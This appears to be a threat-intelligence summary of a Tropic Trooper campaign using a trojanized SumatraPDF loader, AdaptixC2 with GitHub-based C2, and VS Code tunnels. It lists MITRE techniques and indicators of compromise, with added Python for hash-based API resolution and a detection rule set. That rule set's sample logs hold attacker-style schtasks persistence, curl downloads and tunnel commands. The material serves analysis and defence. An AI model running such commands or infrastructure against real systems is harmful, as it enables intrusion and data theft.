Zscaler ThreatLabz discovered a multi-stage Tropic Trooper campaign that used a trojanized SumatraPDF executable (TOSHIS loader) to deploy an AdaptixC2 Beacon and then abuse VS Code tunnels for remote access. The campaign leveraged a custom GitHub-based C2 listener, hosted additional payloads (Cobalt Strike, EntryShell) on staging infrastructure, and targeted Chinese-speaking individuals in Taiwan, South Korea, and Japan. #TropicTrooper #AdaptixC2
Key Points
- A malicious ZIP with military-themed lures contained a trojanized SumatraPDF executable that acted as a TOSHIS loader, initiating a multi-stage infection.
- The loader downloaded a decoy PDF from 58.247.193[.]100 while retrieving and reflectively executing an AES-128-CBC-encrypted AdaptixC2 shellcode in memory.
- The AdaptixC2 Beacon agent was configured with a custom GitHub listener (repo owner cvaS23uchsahs, repo rss) to perform bidirectional C2 over GitHub Issues and repo contents.
- The actor used RC4 session keys and quick deletion of GitHub beacons to hinder analysis, and used ipinfo.io to obtain the victim’s external IP for inclusion in beacons.
- When hosts were of interest, the actor deployed VS Code and used VS Code tunnels for interactive remote access; additional tools (Cobalt Strike, EntryShell) were hosted on the staging server.
- Attribution to Tropic Trooper is high confidence based on reuse of TOSHIS, trojanized binaries, EntryShell, Cobalt Strike watermark “520”, and similar post-infection commands and TTPs.
MITRE Techniques
- [T1585.003] Resource Development: Establish Accounts: Cloud Accounts – The actor created a GitHub account for C2 (‘The threat actor created the GitHub account cvaS23uchsahs, which hosted the RSS registry used for C2 communication.’)
- [T1587.001] Resource Development: Develop Capabilities: Malware – The actor developed a custom GitHub listener for the AdaptixC2 agent and a custom TOSHIS loader (‘the threat actor developed a custom listener for the AdaptixC2 Beacon agent that utilized the GitHub API for C2 communication. In addition, the threat actor developed their own custom TOSHIS loader.’)
- [T1588.001] Resource Development: Obtain Capabilities: Malware – The actor obtained and deployed the open-source AdaptixC2 Beacon agent as the backdoor (‘The threat actor obtained and deployed the open-source AdaptixC2 Beacon agent as their backdoor.’)
- [T1588.002] Resource Development: Obtain Capabilities: Tool – The actor used VS Code’s tunnel feature for remote access (‘The threat actor used VS Code’s tunnel feature for remote access to compromised systems.’)
- [T1608.001] Resource Development: Stage Capabilities: Upload Malware – A second-stage shellcode was hosted on 58.247.193[.]100 for the loader to download and execute (‘the initial loader was designed to download and execute [a] second-stage shellcode payload on their server at 58.247.193[.]100’).
- [T1608.002] Resource Development: Stage Capabilities: Upload Tool – The actor uploaded VS Code to bashupload[.]app which victims downloaded (‘The threat actor uploaded VS Code to bashupload[.]app which was subsequently downloaded onto the victim machines.’)
- [T1204.002] Execution: User Execution: Malicious File – The campaign required user execution of the trojanized lure ‘美英与美澳核潜艇合作的比较分析(2025).exe’ (‘The attack sequence requires a user to run the malicious file titled “美英与美澳核潜艇合作的比较分析(2025).exe”.’)
- [T1106] Execution: Native API – The loader used WinCrypt and ShellExecuteW to decrypt and display the decoy PDF (‘it retrieve[d] a second-stage shellcode … decrypts it using AES-128 CBC with WinCrypt … and opens it using ShellExecuteW.’)
- [T1059.003] Execution: Command and Scripting Interpreter: Windows Command Shell – The actor executed Windows shell commands and cURL for reconnaissance and tool downloads (‘The threat actor utilized the Windows Command Shell to run several commands … and to use cURL for downloading VS Code.’)
- [T1053.005] Persistence: Scheduled Task/Job: Scheduled Task – The actor created scheduled tasks using schtasks to persist the AdaptixC2 agent (‘The threat actor created a scheduled task using schtasks /create to execute the AdaptixC2 agent every two hours for persistence.’)
- [T1036.001] Defense Evasion: Masquerading: Invalid Code Signature – The trojanized SumatraPDF included original certificates but an invalid signature (‘the signature of this binary is invalid because it has been trojanized with TOSHIS loader.’)
- [T1036.004] Defense Evasion: Masquerading: Masquerade Task or Service – Scheduled tasks were named to blend in with legitimate services (MSDNSvc, MicrosoftUDN) (‘the threat actor created scheduled tasks with names intended to blend in with legitimate system tasks such as MSDNSvc and MicrosoftUDN.’)
- [T1620] Defense Evasion: Reflective Code Loading – The loader downloaded and reflectively loaded the AdaptixC2 shellcode in-memory (‘the initial loader downloaded a second-stage shellcode from the C2 IP 58.247.193[.]100 which reflectively loads the AdaptixC2 Beacon agent.’)
- [T1027.007] Defense Evasion: Obfuscated Files or Information: Dynamic API Resolution – The loader resolves APIs by comparing Adler-32 hashes (‘The initial loader identified Windows APIs by comparing Adler-32 hashes of their names.’)
- [T1027.013] Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded File – The loader downloaded an encrypted second-stage payload and decrypted it with AES-128 (‘The initial loader downloaded a second-stage payload and decrypted the shellcode in-memory using AES-128.’)
- [T1127] Defense Evasion: Trusted Developer Utilities Proxy Execution – The actor downloaded Roslyn to compile/execute code (‘The threat actor downloaded Roslyn, an open-source .NET compiler, to compile and execute malicious code.’)
- [T1016] Discovery: System Network Configuration Discovery – The actor ran arp and queried ipinfo.io to learn local and external network info (‘The threat actor ran the command arp /a … The threat actor sent requests to ipinfo.io to identify the external IP address of compromised machines.’)
- [T1005] Collection: Data from Local System – The AdaptixC2 agent used fileupload functionality to exfiltrate local files (‘The threat actor used AdaptixC2 Beacon agent’s fileupload feature to exfiltrate files from infected machines.’)
- [T1071.001] Command and Control: Application Layer Protocol: Web Protocols – The loader and beacon used HTTP/S for payload retrieval and GitHub communications (‘The TOSHIS loader downloaded … over HTTP from 58.247.193[.]100. The AdaptixC2 Beacon agent used HTTP/S to communicate with its GitHub C2.’)
- [T1102.002] Command and Control: Web Service: Bidirectional Communication – The actor used GitHub Issues and repo contents for bidirectional C2 and exfiltration (‘The threat actor used GitHub for bidirectional C2 communication.’)
- [T1219.001] Command and Control: Remote Access Tools: IDE Tunneling – The actor deployed VS Code and used its tunneling for remote interactive access (‘The threat actor deployed VS Code and used its remote tunneling feature for interactive access.’)
- [T1105] Command and Control: Ingress Tool Transfer – The actor used cURL to retrieve VS Code and other tools from external servers (‘The threat actor utilized the cURL command to retrieve tools from external servers onto the compromised system.’)
- [T1132.001] Command and Control: Data Encoding: Standard Encoding – The actor used Base64 and RC4 to encode/obfuscate C2 data (‘The threat actor used Base64 and RC4 to obscure C2 communications.’)
- [T1573.001] Command and Control: Encrypted Channel: Symmetric Cryptography – The AdaptixC2 agent encrypted C2 traffic using an RC4 session key (‘The AdaptixC2 beacon agent encrypted its C2 traffic using an RC4 session key.’)
- [T1573.002] Command and Control: Encrypted Channel: Asymmetric Cryptography – The actor used GitHub API over HTTPS for secure communication (‘The threat actor used the GitHub API for C2, which communicates over HTTPS.’)
- [T1001.003] Exfiltration: Exfiltration Over Web Service: Exfiltration to Code Repository – The actor exfiltrated data via GitHub repo uploads and issue comments (‘The threat actor used the GitHub API to exfiltrate files to a threat actor-controlled code repository.’)
- [T1041] Exfiltration: Exfiltration Over C2 Channel – Data was exfiltrated over the same AdaptixC2/GitHub channel used for commands (‘The threat actor exfiltrated data over the same channel used for C2 communication.’)
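The dynamic API resolution under T1027.007 above works by comparing Adler-32 hashes of export names, so an analyst reversing the loader needs the inverse: a table of hashes for known exports to look up the constants found in the binary. This is an added example, not code from the report or from the loader, and it assumes the names are hashed as bare ASCII strings without a terminating NUL (the report does not say):

```python
import zlib

MOD_ADLER = 65521  # largest prime below 2**16, as in RFC 1950


def adler32(data: bytes) -> int:
    """Plain Adler-32: two running sums, packed as (b << 16) | a."""
    a, b = 1, 0
    for byte in data:
        a = (a + byte) % MOD_ADLER
        b = (b + a) % MOD_ADLER
    return (b << 16) | a


def matches_zlib(data: bytes) -> bool:
    """Cross-check the hand-written routine against the library version."""
    return adler32(data) == (zlib.adler32(data) & 0xFFFFFFFF)


def name_hash(api_name: str) -> int:
    # Assumption (not stated in the report): the loader hashes the bare ASCII
    # export name with no trailing NUL. If constants from a sample do not
    # resolve, try variants here, e.g. appending b"\x00" or lower-casing.
    return adler32(api_name.encode("ascii"))


def build_table(export_names) -> dict:
    """Map hash -> export name so loader constants can be looked up."""
    return {name_hash(n): n for n in export_names}


def resolve(table: dict, h: int):
    """Return the export name for hash h, or None if it is not in the table."""
    return table.get(h)


# Constructed candidate list. A real workflow feeds the full export tables of
# kernel32/advapi32/shell32/wininet dumped from a clean Windows install; the
# report only says the loader uses WinCrypt and ShellExecuteW.
CANDIDATES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CryptAcquireContextW",
    "CryptImportKey", "CryptDecrypt", "ShellExecuteW", "InternetOpenW",
]

if __name__ == "__main__":
    table = build_table(CANDIDATES)
    for h in (name_hash("ShellExecuteW"), 0x11E60398):
        print(f"{h:#010x} -> {resolve(table, h)}")
```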
Indicators of Compromise
- [IP Address] Staging and payload hosting – 58.247.193[.]100 (payload host/decoy PDF), 158.247.193[.]100 (staging server hosting EntryShell/Cobalt Strike).
- [URL] GitHub and C2 endpoints – https://api.github.com/repos/cvaS23uchsahs/rss/issues (AdaptixC2 GitHub C2), https://47.76.236[.]58:4430/Originate/contacts/CX4YJ5JI7RZ (Cobalt Strike C2 URI).
- [Domain] Tool and infrastructure hosts – bashupload[.]app (VS Code/tool downloads), ipinfo.io (external IP lookup), stg.lsmartv[.]com (staging C2 HTTPS host).
- [Filename] Lures and trojanized binaries – 美英与美澳核潜艇合作的比较分析(2025).exe (trojanized SumatraPDF), 资料/美英与美澳核潜艇合作的比较分析(2025).exe (path shown in ZIP archive).
- [File Hash] Sample and payload hashes – 67fcf5c21474d314aa0b27b0ce8befb219e3c4df728e3e657cb9496cd4aaf696 (trojanized SumatraPDF), e2dc48ef24da000b8fc1354fa31ca9ae6c68dc2e33780e07596c3c06aa819ea46 (decrypted AdaptixC2 Beacon DLL), and 8 more hashes.
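To turn the post-infection behaviours above (schtasks persistence under masquerading task names, the cURL download from bashupload[.]app, the VS Code tunnel, the ipinfo.io lookup) into something a SOC can check against process-creation telemetry, here is an added example that is not from the report. The log line format, the sample lines and the regex wording are assumptions to adapt to your own EDR fields; `/tn` is the real schtasks task-name switch and `code tunnel` is the real VS Code CLI command that starts a tunnel.

```python
import re

# Hypothetical rules, one per behaviour the report describes. The page gives
# the defanged domain bashupload[.]app; telemetry carries the real string.
RULES = {
    "schtasks_masquerade": re.compile(
        r'schtasks(\.exe)?\s+/create\b.*\s/tn\s+"?(MSDNSvc|MicrosoftUDN)\b', re.I),
    "curl_bashupload": re.compile(r'\bcurl(\.exe)?\b.*bashupload\.app', re.I),
    "vscode_tunnel": re.compile(r'\bcode(\.exe)?\s+tunnel\b', re.I),
    "external_ip_lookup": re.compile(r'\bipinfo\.io\b', re.I),
}

# Constructed process-creation events (not real telemetry). Four malicious,
# three benign look-alikes that must not fire.
SAMPLE_LOGS = [
    'host=WS01 user=alice cmdline="schtasks /create /sc hourly /mo 2 /tn MSDNSvc /tr C:\\Users\\Public\\svc.exe"',
    'host=WS01 user=alice cmdline="curl -o C:\\Users\\Public\\vscode.zip https://bashupload.app/PLACEHOLDER"',
    'host=WS01 user=alice cmdline="code tunnel"',
    'host=WS01 user=alice cmdline="curl https://ipinfo.io/json"',
    'host=WS02 user=bob cmdline="schtasks /query /tn \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"',
    'host=WS02 user=bob cmdline="code C:\\src\\project"',
    'host=WS02 user=bob cmdline="curl https://example.com/"',
]


def command_line(event: str) -> str:
    """Pull the quoted cmdline field out of a log event; fall back to the whole line."""
    m = re.search(r'cmdline="(.*)"$', event)
    return m.group(1) if m else event


def scan(events):
    """Return (rule_name, cmdline) for every rule that matches an event."""
    hits = []
    for event in events:
        cmd = command_line(event)
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.append((name, cmd))
    return hits


if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_LOGS):
        print(f"[{rule}] {cmd}")
```

A single hit on `external_ip_lookup` is weak on its own; the value of the rule set is the sequence on one host, which is what the report describes.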